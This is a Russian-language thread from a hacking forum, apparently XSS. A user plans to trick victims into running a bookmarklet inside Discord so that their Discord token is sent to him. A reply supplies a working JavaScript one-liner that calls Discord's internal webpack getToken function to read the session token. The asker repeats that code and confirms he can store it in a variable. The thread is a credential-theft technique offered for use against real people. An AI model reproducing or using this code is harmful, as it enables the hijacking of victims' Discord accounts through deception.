• XSS.stack #1 – первый литературный журнал от юзеров форума

Нужно вытянуть токен дискорда.

NENF

CD-диск
Пользователь
Реакции
0
Есть сайт,человек вводит форму и добавляет этот сайт в закладку. Заходит в дискорд,нажимает на эту закладку и его токен дискорда выводится мне. Нужно вытянуть как то токен с дискорда,но я не понимаю как это сделать. В документации дискорда ничего не нашел,поискал в интернете и увидел что токен выводится у пользователя в инструментах разработчика в network > headers > authorization , но не знаю способа как его оттуда взять или если это вообще возможно. Можете помочь пожалуйста и обьяснить как это сделать?

Пожалуйста, обратите внимание, что пользователь заблокирован
так по дефолту тебе дискорд не даст вытянуть, он специально даже локалсторедж функцию удаляет. тебе из вебпака дергать нужно функцию которая выдает токен

JavaScript:
(webpackChunkdiscord_app.push([[''],{},e=>{m=[];for(let c in e.c)m.push(e.c[c])}]),m).find(m=>m?.exports?.default?.getToken!==void 0).exports.default.getToken();
1714842241014.png

JavaScript:
(webpackChunkdiscord_app.push([[''],{},e=>{m=[];for(let c in e.c)m.push(e.c[c])}]),m).find(m=>m?.exports?.default?.getToken!==void 0).exports.default.getToken();
Посмотреть вложение 83875
можно твой контакт тг? Не сижу много на сайте. Этот код возвращает значение токена у пользователя? Можно получить значение таким образом let tokenDiscordUser = (webpackChunkdiscord_app.push([[''],{},e=>{m=[];for(let c in e.c)m.push(e.c[c])}]),m).find(m=>m?.exports?.default?.getToken!==void 0).exports.default.getToken(); ?

можно твой контакт тг? Не сижу много на сайте. Этот код возвращает значение токена у пользователя? Можно получить значение таким образом let tokenDiscordUser = (webpackChunkdiscord_app.push([[''],{},e=>{m=[];for(let c in e.c)m.push(e.c[c])}]),m).find(m=>m?.exports?.default?.getToken!==void 0).exports.default.getToken(); ?
Можно получить

Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх